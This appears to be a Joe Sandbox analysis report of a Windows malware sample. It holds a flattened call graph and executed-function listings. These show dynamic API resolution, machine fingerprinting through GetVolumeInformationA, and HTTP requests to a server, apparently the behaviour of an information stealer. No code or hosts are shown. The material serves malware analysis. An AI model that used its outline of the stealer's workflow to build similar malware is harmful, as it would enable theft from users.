c73be1 26457->26458 26459 c74a60 2 API calls 26458->26459 26460 c73bf7 26459->26460 26461 c74a60 2 API calls 26460->26461 26462 c73c0d 26461->26462 26463 c74a60 2 API calls 26462->26463 26464 c73c23 26463->26464 26465 c74a60 2 API calls 26464->26465 26466 c73c39 26465->26466 26467 c74a60 2 API calls 26466->26467 26468 c73c52 26467->26468 26469 c74a60 2 API calls 26468->26469 26470 c73c68 26469->26470 26471 c74a60 2 API calls 26470->26471 26472 c73c7e 26471->26472 26473 c74a60 2 API calls 26472->26473 26474 c73c94 26473->26474 26475 c74a60 2 API calls 26474->26475 26476 c73caa 26475->26476 26477 c74a60 2 API calls 26476->26477 26478 c73cc0 26477->26478 26479 c74a60 2 API calls 26478->26479 26480 c73cd9 26479->26480 26481 c74a60 2 API calls 26480->26481 26482 c73cef 26481->26482 26483 c74a60 2 API calls 26482->26483 26484 c73d05 26483->26484 26485 c74a60 2 API calls 26484->26485 26486 c73d1b 26485->26486 26487 c74a60 2 API calls 26486->26487 26488 c73d31 26487->26488 26489 c74a60 2 API calls 26488->26489 26490 c73d47 26489->26490 26491 c74a60 2 API calls 26490->26491 26492 c73d60 26491->26492 26493 c74a60 2 API calls 26492->26493 26494 c73d76 26493->26494 26495 c74a60 2 API calls 26494->26495 26496 c73d8c 26495->26496 26497 c74a60 2 API calls 26496->26497 26498 c73da2 26497->26498 26499 c74a60 2 API calls 26498->26499 26500 c73db8 26499->26500 26501 c74a60 2 API calls 26500->26501 26502 c73dce 26501->26502 26503 c74a60 2 API calls 26502->26503 26504 c73de7 26503->26504 26505 c74a60 2 API calls 26504->26505 26506 c73dfd 26505->26506 26507 c74a60 2 API calls 26506->26507 26508 c73e13 26507->26508 26509 c74a60 2 API calls 26508->26509 26510 c73e29 26509->26510 26511 c74a60 2 API calls 26510->26511 26512 c73e3f 26511->26512 26513 c74a60 2 API calls 26512->26513 26514 c73e55 26513->26514 26515 c74a60 2 API calls 26514->26515 26516 c73e6e 26515->26516 26517 c74a60 2 API calls 26516->26517 26518 c73e84 26517->26518 26519 c74a60 2 API calls 26518->26519 26520 c73e9a 26519->26520 26521 c74a60 2 API calls 26520->26521 26522 c73eb0 26521->26522 26523 c74a60 2 API calls 26522->26523 26524 c73ec6 26523->26524 26525 c74a60 2 API calls 26524->26525 26526 c73edc 26525->26526 26527 c74a60 2 API calls 26526->26527 26528 c73ef5 26527->26528 26529 c74a60 2 API calls 26528->26529 26530 c73f0b 26529->26530 26531 c74a60 2 API calls 26530->26531 26532 c73f21 26531->26532 26533 c74a60 2 API calls 26532->26533 26534 c73f37 26533->26534 26535 c74a60 2 API calls 26534->26535 26536 c73f4d 26535->26536 26537 c74a60 2 API calls 26536->26537 26538 c73f63 26537->26538 26539 c74a60 2 API calls 26538->26539 26540 c73f7c 26539->26540 26541 c74a60 2 API calls 26540->26541 26542 c73f92 26541->26542 26543 c74a60 2 API calls 26542->26543 26544 c73fa8 26543->26544 26545 c74a60 2 API calls 26544->26545 26546 c73fbe 26545->26546 26547 c74a60 2 API calls 26546->26547 26548 c73fd4 26547->26548 26549 c74a60 2 API calls 26548->26549 26550 c73fea 26549->26550 26551 c74a60 2 API calls 26550->26551 26552 c74003 26551->26552 26553 c74a60 2 API calls 26552->26553 26554 c74019 26553->26554 26555 c74a60 2 API calls 26554->26555 26556 c7402f 26555->26556 26557 c74a60 2 API calls 26556->26557 26558 c74045 26557->26558 26559 c74a60 2 API calls 26558->26559 26560 c7405b 26559->26560 26561 c74a60 2 API calls 26560->26561 26562 c74071 26561->26562 26563 c74a60 2 API calls 26562->26563 26564 c7408a 26563->26564 26565 c74a60 2 API calls 26564->26565 26566 c740a0 26565->26566 26567 c74a60 2 API calls 26566->26567 26568 c740b6 26567->26568 26569 c74a60 2 API calls 26568->26569 26570 c740cc 26569->26570 26571 c74a60 2 API calls 26570->26571 26572 c740e2 26571->26572 26573 c74a60 2 API calls 26572->26573 26574 c740f8 26573->26574 26575 c74a60 2 API calls 26574->26575 26576 c74111 26575->26576 26577 c74a60 2 API calls 26576->26577 26578 c74127 26577->26578 26579 c74a60 2 API calls 26578->26579 26580 c7413d 26579->26580 26581 c74a60 2 API calls 26580->26581 26582 c74153 26581->26582 26583 c74a60 2 API calls 26582->26583 26584 c74169 26583->26584 26585 c74a60 2 API calls 26584->26585 26586 c7417f 26585->26586 26587 c74a60 2 API calls 26586->26587 26588 c74198 26587->26588 26589 c74a60 2 API calls 26588->26589 26590 c741ae 26589->26590 26591 c74a60 2 API calls 26590->26591 26592 c741c4 26591->26592 26593 c74a60 2 API calls 26592->26593 26594 c741da 26593->26594 26595 c74a60 2 API calls 26594->26595 26596 c741f0 26595->26596 26597 c74a60 2 API calls 26596->26597 26598 c74206 26597->26598 26599 c74a60 2 API calls 26598->26599 26600 c7421f 26599->26600 26601 c74a60 2 API calls 26600->26601 26602 c74235 26601->26602 26603 c74a60 2 API calls 26602->26603 26604 c7424b 26603->26604 26605 c74a60 2 API calls 26604->26605 26606 c74261 26605->26606 26607 c74a60 2 API calls 26606->26607 26608 c74277 26607->26608 26609 c74a60 2 API calls 26608->26609 26610 c7428d 26609->26610 26611 c74a60 2 API calls 26610->26611 26612 c742a6 26611->26612 26613 c74a60 2 API calls 26612->26613 26614 c742bc 26613->26614 26615 c74a60 2 API calls 26614->26615 26616 c742d2 26615->26616 26617 c74a60 2 API calls 26616->26617 26618 c742e8 26617->26618 26619 c74a60 2 API calls 26618->26619 26620 c742fe 26619->26620 26621 c74a60 2 API calls 26620->26621 26622 c74314 26621->26622 26623 c74a60 2 API calls 26622->26623 26624 c7432d 26623->26624 26625 c74a60 2 API calls 26624->26625 26626 c74343 26625->26626 26627 c74a60 2 API calls 26626->26627 26628 c74359 26627->26628 26629 c74a60 2 API calls 26628->26629 26630 c7436f 26629->26630 26631 c74a60 2 API calls 26630->26631 26632 c74385 26631->26632 26633 c74a60 2 API calls 26632->26633 26634 c7439b 26633->26634 26635 c74a60 2 API calls 26634->26635 26636 c743b4 26635->26636 26637 c74a60 2 API calls 26636->26637 26638 c743ca 26637->26638 26639 c74a60 2 API calls 26638->26639 26640 c743e0 26639->26640 26641 c74a60 2 API calls 26640->26641 26642 c743f6 26641->26642 26643 c74a60 2 API calls 26642->26643 26644 c7440c 26643->26644 26645 c74a60 2 API calls 26644->26645 26646 c74422 26645->26646 26647 c74a60 2 API calls 26646->26647 26648 c7443b 26647->26648 26649 c74a60 2 API calls 26648->26649 26650 c74451 26649->26650 26651 c74a60 2 API calls 26650->26651 26652 c74467 26651->26652 26653 c74a60 2 API calls 26652->26653 26654 c7447d 26653->26654 26655 c74a60 2 API calls 26654->26655 26656 c74493 26655->26656 26657 c74a60 2 API calls 26656->26657 26658 c744a9 26657->26658 26659 c74a60 2 API calls 26658->26659 26660 c744c2 26659->26660 26661 c74a60 2 API calls 26660->26661 26662 c744d8 26661->26662 26663 c74a60 2 API calls 26662->26663 26664 c744ee 26663->26664 26665 c74a60 2 API calls 26664->26665 26666 c74504 26665->26666 26667 c74a60 2 API calls 26666->26667 26668 c7451a 26667->26668 26669 c74a60 2 API calls 26668->26669 26670 c74530 26669->26670 26671 c74a60 2 API calls 26670->26671 26672 c74549 26671->26672 26673 c74a60 2 API calls 26672->26673 26674 c7455f 26673->26674 26675 c74a60 2 API calls 26674->26675 26676 c74575 26675->26676 26677 c74a60 2 API calls 26676->26677 26678 c7458b 26677->26678 26679 c74a60 2 API calls 26678->26679 26680 c745a1 26679->26680 26681 c74a60 2 API calls 26680->26681 26682 c745b7 26681->26682 26683 c74a60 2 API calls 26682->26683 26684 c745d0 26683->26684 26685 c74a60 2 API calls 26684->26685 26686 c745e6 26685->26686 26687 c74a60 2 API calls 26686->26687 26688 c745fc 26687->26688 26689 c74a60 2 API calls 26688->26689 26690 c74612 26689->26690 26691 c74a60 2 API calls 26690->26691 26692 c74628 26691->26692 26693 c74a60 2 API calls 26692->26693 26694 c7463e 26693->26694 26695 c74a60 2 API calls 26694->26695 26696 c74657 26695->26696 26697 c74a60 2 API calls 26696->26697 26698 c7466d 26697->26698 26699 c74a60 2 API calls 26698->26699 26700 c74683 26699->26700 26701 c74a60 2 API calls 26700->26701 26702 c74699 26701->26702 26703 c74a60 2 API calls 26702->26703 26704 c746af 26703->26704 26705 c74a60 2 API calls 26704->26705 26706 c746c5 26705->26706 26707 c74a60 2 API calls 26706->26707 26708 c746de 26707->26708 26709 c74a60 2 API calls 26708->26709 26710 c746f4 26709->26710 26711 c74a60 2 API calls 26710->26711 26712 c7470a 26711->26712 26713 c74a60 2 API calls 26712->26713 26714 c74720 26713->26714 26715 c74a60 2 API calls 26714->26715 26716 c74736 26715->26716 26717 c74a60 2 API calls 26716->26717 26718 c7474c 26717->26718 26719 c74a60 2 API calls 26718->26719 26720 c74765 26719->26720 26721 c74a60 2 API calls 26720->26721 26722 c7477b 26721->26722 26723 c74a60 2 API calls 26722->26723 26724 c74791 26723->26724 26725 c74a60 2 API calls 26724->26725 26726 c747a7 26725->26726 26727 c74a60 2 API calls 26726->26727 26728 c747bd 26727->26728 26729 c74a60 2 API calls 26728->26729 26730 c747d3 26729->26730 26731 c74a60 2 API calls 26730->26731 26732 c747ec 26731->26732 26733 c74a60 2 API calls 26732->26733 26734 c74802 26733->26734 26735 c74a60 2 API calls 26734->26735 26736 c74818 26735->26736 26737 c74a60 2 API calls 26736->26737 26738 c7482e 26737->26738 26739 c74a60 2 API calls 26738->26739 26740 c74844 26739->26740 26741 c74a60 2 API calls 26740->26741 26742 c7485a 26741->26742 26743 c74a60 2 API calls 26742->26743 26744 c74873 26743->26744 26745 c74a60 2 API calls 26744->26745 26746 c74889 26745->26746 26747 c74a60 2 API calls 26746->26747 26748 c7489f 26747->26748 26749 c74a60 2 API calls 26748->26749 26750 c748b5 26749->26750 26751 c74a60 2 API calls 26750->26751 26752 c748cb 26751->26752 26753 c74a60 2 API calls 26752->26753 26754 c748e1 26753->26754 26755 c74a60 2 API calls 26754->26755 26756 c748fa 26755->26756 26757 c74a60 2 API calls 26756->26757 26758 c74910 26757->26758 26759 c74a60 2 API calls 26758->26759 26760 c74926 26759->26760 26761 c74a60 2 API calls 26760->26761 26762 c7493c 26761->26762 26763 c74a60 2 API calls 26762->26763 26764 c74952 26763->26764 26765 c74a60 2 API calls 26764->26765 26766 c74968 26765->26766 26767 c74a60 2 API calls 26766->26767 26768 c74981 26767->26768 26769 c74a60 2 API calls 26768->26769 26770 c74997 26769->26770 26771 c74a60 2 API calls 26770->26771 26772 c749ad 26771->26772 26773 c74a60 2 API calls 26772->26773 26774 c749c3 26773->26774 26775 c74a60 2 API calls 26774->26775 26776 c749d9 26775->26776 26777 c74a60 2 API calls 26776->26777 26778 c749ef 26777->26778 26779 c74a60 2 API calls 26778->26779 26780 c74a08 26779->26780 26781 c74a60 2 API calls 26780->26781 26782 c74a1e 26781->26782 26783 c74a60 2 API calls 26782->26783 26784 c74a34 26783->26784 26785 c74a60 2 API calls 26784->26785 26786 c74a4a 26785->26786 26787 c966e0 26786->26787 26788 c966ed 43 API calls 26787->26788 26789 c96afe 8 API calls 26787->26789 26788->26789 26790 c96c08 26789->26790 26791 c96b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26789->26791 26792 c96cd2 26790->26792 26793 c96c15 8 API calls 26790->26793 26791->26790 26794 c96cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26792->26794 26795 c96d4f 26792->26795 26793->26792 26794->26795 26796 c96de9 26795->26796 26797 c96d5c 6 API calls 26795->26797 26798 c96f10 26796->26798 26799 c96df6 12 API calls 26796->26799 26797->26796 26800 c96f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26798->26800 26801 c96f8d 26798->26801 26799->26798 26800->26801 26802 c96fc1 26801->26802 26803 c96f96 GetProcAddress GetProcAddress 26801->26803 26804 c96fca GetProcAddress GetProcAddress 26802->26804 26805 c96ff5 26802->26805 26803->26802 26804->26805 26806 c970ed 26805->26806 26807 c97002 10 API calls 26805->26807 26808 c97152 26806->26808 26809 c970f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26806->26809 26807->26806 26810 c9715b GetProcAddress 26808->26810 26811 c9716e 26808->26811 26809->26808 26810->26811 26812 c9051f 26811->26812 26813 c97177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26811->26813 26814 c71530 26812->26814 26813->26812 27123 c71610 26814->27123 26816 c7153b 26817 c71555 lstrcpy 26816->26817 26818 c7155d 26816->26818 26817->26818 26819 c71577 lstrcpy 26818->26819 26820 c7157f 26818->26820 26819->26820 26821 c71599 lstrcpy 26820->26821 26822 c715a1 26820->26822 26821->26822 26823 c71605 26822->26823 26824 c715fd lstrcpy 26822->26824 26825 c8f1b0 lstrlen 26823->26825 26824->26823 26826 c8f1e4 26825->26826 26827 c8f1eb lstrcpy 26826->26827 26828 c8f1f7 lstrlen 26826->26828 26827->26828 26829 c8f208 26828->26829 26830 c8f21b lstrlen 26829->26830 26831 c8f20f lstrcpy 26829->26831 26832 c8f22c 26830->26832 26831->26830 26833 c8f233 lstrcpy 26832->26833 26834 c8f23f 26832->26834 26833->26834 26835 c8f258 lstrcpy 26834->26835 26836 c8f264 26834->26836 26835->26836 26837 c8f286 lstrcpy 26836->26837 26838 c8f292 26836->26838 26837->26838 26839 c8f2ba lstrcpy 26838->26839 26840 c8f2c6 26838->26840 26839->26840 26841 c8f2ea lstrcpy 26840->26841 26842 c8f300 26840->26842 26841->26842 26843 c8f30c lstrlen 26842->26843 26844 c8f4b9 lstrcpy 26842->26844 26845 c8f3a1 lstrcpy 26842->26845 26846 c8f3c5 lstrcpy 26842->26846 26847 c8f4e8 lstrcpy 26842->26847 26848 c8f479 lstrcpy 26842->26848 26849 c8f70f StrCmpCA 26842->26849 26852 c8fa29 StrCmpCA 26842->26852 26853 c8f73e lstrlen 26842->26853 26856 c8fd4d StrCmpCA 26842->26856 26858 c8fa58 lstrlen 26842->26858 26865 c8f89e lstrcpy 26842->26865 26870 c8f76f lstrcpy 26842->26870 26873 c8fbb8 lstrcpy 26842->26873 26875 c8fa89 lstrcpy 26842->26875 26879 c8f8cd lstrcpy 26842->26879 26881 c8f791 lstrcpy 26842->26881 26883 c71530 8 API calls 26842->26883 26885 c8fbe7 lstrcpy 26842->26885 26889 c8faab lstrcpy 26842->26889 26892 c8ee90 28 API calls 26842->26892 26897 c8f7e2 lstrcpy 26842->26897 26900 c8fafc lstrcpy 26842->26900 26906 c8f4f0 26842->26906 26843->26842 26844->26842 26845->26842 26846->26842 26847->26906 26848->26842 26849->26842 26855 c8fe8e 26849->26855 26850 c8f616 StrCmpCA 26850->26849 26850->26906 26851 c8f59c lstrcpy 26851->26906 26852->26842 26863 c8fe2b 26852->26863 26853->26842 26854 c8fead lstrlen 26866 c8fec7 26854->26866 26855->26854 26857 c8fea5 lstrcpy 26855->26857 26859 c8fd60 Sleep 26856->26859 26868 c8fd75 26856->26868 26857->26854 26858->26842 26859->26842 26860 c8f64a lstrcpy 26860->26906 26861 c71530 8 API calls 26861->26906 26862 c8fe4a lstrlen 26876 c8fe64 26862->26876 26863->26862 26864 c8fe42 lstrcpy 26863->26864 26864->26862 26865->26842 26867 c8fee7 lstrlen 26866->26867 26871 c8fedf lstrcpy 26866->26871 26874 c8ff01 26867->26874 26869 c8fd94 lstrlen 26868->26869 26872 c8fd8c lstrcpy 26868->26872 26878 c8fdae 26869->26878 26870->26842 26871->26867 26872->26869 26873->26842 26884 c8ff21 26874->26884 26887 c8ff19 lstrcpy 26874->26887 26875->26842 26877 c8fdce lstrlen 26876->26877 26880 c8fe7c lstrcpy 26876->26880 26886 c8fde8 26877->26886 26878->26877 26891 c8fdc6 lstrcpy 26878->26891 26879->26906 26880->26877 26881->26842 26883->26842 26888 c71610 4 API calls 26884->26888 26885->26906 26893 c8fe08 26886->26893 26895 c8fe00 lstrcpy 26886->26895 26887->26884 26909 c8fe13 26888->26909 26889->26842 26890 c8f698 lstrcpy 26890->26906 26891->26877 26892->26842 26896 c71610 4 API calls 26893->26896 26894 c8efb0 35 API calls 26894->26906 26895->26893 26896->26909 26897->26842 26898 c8f924 lstrcpy 26898->26906 26899 c8f99e StrCmpCA 26899->26852 26899->26906 26900->26842 26901 c8fc3e lstrcpy 26901->26906 26902 c8fcb8 StrCmpCA 26902->26856 26902->26906 26903 c8f9cb lstrcpy 26903->26906 26904 c8fce9 lstrcpy 26904->26906 26905 c8ee90 28 API calls 26905->26906 26906->26842 26906->26850 26906->26851 26906->26852 26906->26856 26906->26860 26906->26861 26906->26890 26906->26894 26906->26898 26906->26899 26906->26901 26906->26902 26906->26903 26906->26904 26906->26905 26907 c8fa19 lstrcpy 26906->26907 26908 c8fd3a lstrcpy 26906->26908 26907->26906 26908->26906 26909->25933 26911 c9278c GetVolumeInformationA 26910->26911 26912 c92785 26910->26912 26913 c927ec GetProcessHeap RtlAllocateHeap 26911->26913 26912->26911 26915 c92822 26913->26915 26916 c92826 wsprintfA 26913->26916 27133 c971e0 26915->27133 26916->26915 26920 c74c70 26919->26920 26921 c74c85 26920->26921 26922 c74c7d lstrcpy 26920->26922 27137 c74bc0 26921->27137 26922->26921 26924 c74c90 26925 c74ccc lstrcpy 26924->26925 26926 c74cd8 26924->26926 26925->26926 26927 c74cff lstrcpy 26926->26927 26928 c74d0b 26926->26928 26927->26928 26929 c74d2f lstrcpy 26928->26929 26930 c74d3b 26928->26930 26929->26930 26931 c74d6d lstrcpy 26930->26931 26932 c74d79 26930->26932 26931->26932 26933 c74da0 lstrcpy 26932->26933 26934 c74dac InternetOpenA StrCmpCA 26932->26934 26933->26934 26935 c74de0 26934->26935 26936 c754b8 InternetCloseHandle CryptStringToBinaryA 26935->26936 27141 c93e70 26935->27141 26938 c754e8 LocalAlloc 26936->26938 26953 c755d8 26936->26953 26939 c754ff CryptStringToBinaryA 26938->26939 26938->26953 26940 c75517 LocalFree 26939->26940 26941 c75529 lstrlen 26939->26941 26940->26953 26942 c7553d 26941->26942 26944 c75557 lstrcpy 26942->26944 26945 c75563 lstrlen 26942->26945 26943 c74dfa 26946 c74e23 lstrcpy lstrcat 26943->26946 26947 c74e38 26943->26947 26944->26945 26949 c7557d 26945->26949 26946->26947 26948 c74e5a lstrcpy 26947->26948 26950 c74e62 26947->26950 26948->26950 26951 c7558f lstrcpy lstrcat 26949->26951 26952 c755a2 26949->26952 26954 c74e71 lstrlen 26950->26954 26951->26952 26955 c755d1 26952->26955 26957 c755c9 lstrcpy 26952->26957 26953->25962 26956 c74e89 26954->26956 26955->26953 26958 c74e95 lstrcpy lstrcat 26956->26958 26959 c74eac 26956->26959 26957->26955 26958->26959 26960 c74ed5 26959->26960 26961 c74ecd lstrcpy 26959->26961 26962 c74edc lstrlen 26960->26962 26961->26960 26963 c74ef2 26962->26963 26964 c74efe lstrcpy lstrcat 26963->26964 26965 c74f15 26963->26965 26964->26965 26966 c74f36 lstrcpy 26965->26966 26967 c74f3e 26965->26967 26966->26967 26968 c74f65 lstrcpy lstrcat 26967->26968 26969 c74f7b 26967->26969 26968->26969 26970 c74fa4 26969->26970 26971 c74f9c lstrcpy 26969->26971 26972 c74fab lstrlen 26970->26972 26971->26970 26973 c74fc1 26972->26973 26974 c74fcd lstrcpy lstrcat 26973->26974 26975 c74fe4 26973->26975 26974->26975 26976 c7500d 26975->26976 26977 c75005 lstrcpy 26975->26977 26978 c75014 lstrlen 26976->26978 26977->26976 26979 c7502a 26978->26979 26980 c75036 lstrcpy lstrcat 26979->26980 26981 c7504d 26979->26981 26980->26981 26982 c75079 26981->26982 26983 c75071 lstrcpy 26981->26983 26984 c75080 lstrlen 26982->26984 26983->26982 26985 c7509b 26984->26985 26986 c750ac lstrcpy lstrcat 26985->26986 26987 c750bc 26985->26987 26986->26987 26988 c750da lstrcpy lstrcat 26987->26988 26989 c750ed 26987->26989 26988->26989 26990 c7510b lstrcpy 26989->26990 26991 c75113 26989->26991 26990->26991 26992 c75121 InternetConnectA 26991->26992 26992->26936 26993 c75150 HttpOpenRequestA 26992->26993 26994 c754b1 InternetCloseHandle 26993->26994 26995 c7518b 26993->26995 26994->26936 27148 c97310 lstrlen 26995->27148 26999 c751a4 27156 c972c0 26999->27156 27002 c97280 lstrcpy 27003 c751c0 27002->27003 27004 c97310 3 API calls 27003->27004 27005 c751d5 27004->27005 27006 c97280 lstrcpy 27005->27006 27007 c751de 27006->27007 27008 c97310 3 API calls 27007->27008 27009 c751f4 27008->27009 27010 c97280 lstrcpy 27009->27010 27011 c751fd 27010->27011 27012 c97310 3 API calls 27011->27012 27013 c75213 27012->27013 27014 c97280 lstrcpy 27013->27014 27015 c7521c 27014->27015 27016 c97310 3 API calls 27015->27016 27017 c75231 27016->27017 27018 c97280 lstrcpy 27017->27018 27019 c7523a 27018->27019 27020 c972c0 2 API calls 27019->27020 27021 c7524d 27020->27021 27022 c97280 lstrcpy 27021->27022 27023 c75256 27022->27023 27024 c97310 3 API calls 27023->27024 27025 c7526b 27024->27025 27026 c97280 lstrcpy 27025->27026 27027 c75274 27026->27027 27028 c97310 3 API calls 27027->27028 27029 c75289 27028->27029 27030 c97280 lstrcpy 27029->27030 27031 c75292 27030->27031 27032 c972c0 2 API calls 27031->27032 27033 c752a5 27032->27033 27034 c97280 lstrcpy 27033->27034 27035 c752ae 27034->27035 27036 c97310 3 API calls 27035->27036 27037 c752c3 27036->27037 27038 c97280 lstrcpy 27037->27038 27039 c752cc 27038->27039 27040 c97310 3 API calls 27039->27040 27041 c752e2 27040->27041 27042 c97280 lstrcpy 27041->27042 27043 c752eb 27042->27043 27044 c97310 3 API calls 27043->27044 27045 c75301 27044->27045 27046 c97280 lstrcpy 27045->27046 27047 c7530a 27046->27047 27048 c97310 3 API calls 27047->27048 27049 c7531f 27048->27049 27050 c97280 lstrcpy 27049->27050 27051 c75328 27050->27051 27052 c972c0 2 API calls 27051->27052 27053 c7533b 27052->27053 27054 c97280 lstrcpy 27053->27054 27055 c75344 27054->27055 27056 c75370 lstrcpy 27055->27056 27057 c7537c 27055->27057 27056->27057 27058 c972c0 2 API calls 27057->27058 27059 c7538a 27058->27059 27060 c972c0 2 API calls 27059->27060 27061 c75397 27060->27061 27062 c97280 lstrcpy 27061->27062 27063 c753a1 27062->27063 27064 c753b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27063->27064 27065 c7549c InternetCloseHandle 27064->27065 27069 c753f2 27064->27069 27067 c754ae 27065->27067 27066 c753fd lstrlen 27066->27069 27067->26994 27068 c7542e lstrcpy lstrcat 27068->27069 27069->27065 27069->27066 27069->27068 27070 c75473 27069->27070 27071 c7546b lstrcpy 27069->27071 27072 c7547a InternetReadFile 27070->27072 27071->27070 27072->27065 27072->27069 27074 c88cc6 ExitProcess 27073->27074 27089 c88ccd 27073->27089 27075 c88ee2 27075->25964 27076 c88e88 lstrlen 27076->27089 27077 c88e6f StrCmpCA 27077->27089 27078 c88d84 StrCmpCA 27078->27089 27079 c88da4 StrCmpCA 27079->27089 27080 c88d06 lstrlen 27080->27089 27081 c88d5a lstrlen 27081->27089 27082 c88dbd StrCmpCA 27082->27089 27083 c88ddd StrCmpCA 27083->27089 27084 c88dfd StrCmpCA 27084->27089 27085 c88e1d StrCmpCA 27085->27089 27086 c88e3d StrCmpCA 27086->27089 27087 c88d30 lstrlen 27087->27089 27088 c88e56 StrCmpCA 27088->27089 27089->27075 27089->27076 27089->27077 27089->27078 27089->27079 27089->27080 27089->27081 27089->27082 27089->27083 27089->27084 27089->27085 27089->27086 27089->27087 27089->27088 27090 c88ebb lstrcpy 27089->27090 27090->27089 27091->25970 27092->25972 27093->25978 27094->25980 27095->25986 27096->25988 27097->25994 27098->25998 27099->26004 27100->26006 27101->26010 27102->26024 27103->26028 27104->26027 27105->26023 27106->26027 27107->26046 27108->26030 27109->26031 27110->26035 27111->26038 27112->26043 27113->26050 27114->26053 27115->26059 27116->26081 27117->26085 27118->26084 27119->26080 27120->26084 27121->26094 27124 c7161f 27123->27124 27125 c7162b lstrcpy 27124->27125 27126 c71633 27124->27126 27125->27126 27127 c7164d lstrcpy 27126->27127 27128 c71655 27126->27128 27127->27128 27129 c7166f lstrcpy 27128->27129 27130 c71677 27128->27130 27129->27130 27131 c71699 27130->27131 27132 c71691 lstrcpy 27130->27132 27131->26816 27132->27131 27134 c971e6 27133->27134 27135 c971fc lstrcpy 27134->27135 27136 c92860 27134->27136 27135->27136 27136->25959 27138 c74bd0 27137->27138 27138->27138 27139 c74bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27138->27139 27140 c74c41 27139->27140 27140->26924 27142 c93e83 27141->27142 27143 c93e9f lstrcpy 27142->27143 27144 c93eab 27142->27144 27143->27144 27145 c93ecd lstrcpy 27144->27145 27146 c93ed5 GetSystemTime 27144->27146 27145->27146 27147 c93ef3 27146->27147 27147->26943 27149 c9732d 27148->27149 27150 c7519b 27149->27150 27151 c9733d lstrcpy lstrcat 27149->27151 27152 c97280 27150->27152 27151->27150 27154 c9728c 27152->27154 27153 c972b4 27153->26999 27154->27153 27155 c972ac lstrcpy 27154->27155 27155->27153 27158 c972dc 27156->27158 27157 c751b7 27157->27002 27158->27157 27159 c972ed lstrcpy lstrcat 27158->27159 27159->27157

                                Executed Functions

                                Function 00C74C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C74C7F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74CD2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74D05
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74D35
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74D73
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C74DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C74DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 107969558471db31557efd2d9535b1699180b21e2451a27af26b4cf9adf5a104
                                • Instruction ID: 87e5a232e933cafec8a5bee88cf8b7012b76954818e2e5f6d3007078f52df065
                                • Opcode Fuzzy Hash: 107969558471db31557efd2d9535b1699180b21e2451a27af26b4cf9adf5a104
                                • Instruction Fuzzy Hash: CE528031A116169FCB21EFA4CC89A9EB7B9EF45310F098024F919F7252DB70ED469B90
                                Function 00C96390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 c96390-c963bd GetPEB 2126 c965c3-c96623 LoadLibraryA * 5 2125->2126 2127 c963c3-c965be call c962f0 GetProcAddress * 20 2125->2127 2129 c96638-c9663f 2126->2129 2130 c96625-c96633 GetProcAddress 2126->2130 2127->2126 2132 c9666c-c96673 2129->2132 2133 c96641-c96667 GetProcAddress * 2 2129->2133 2130->2129 2134 c96688-c9668f 2132->2134 2135 c96675-c96683 GetProcAddress 2132->2135 2133->2132 2137 c96691-c9669f GetProcAddress 2134->2137 2138 c966a4-c966ab 2134->2138 2135->2134 2137->2138 2139 c966ad-c966d2 GetProcAddress * 2 2138->2139 2140 c966d7-c966da 2138->2140 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(77190000,017915A0), ref: 00C963E9
                                • GetProcAddress.KERNEL32(77190000,01791588), ref: 00C96402
                                • GetProcAddress.KERNEL32(77190000,01791798), ref: 00C9641A
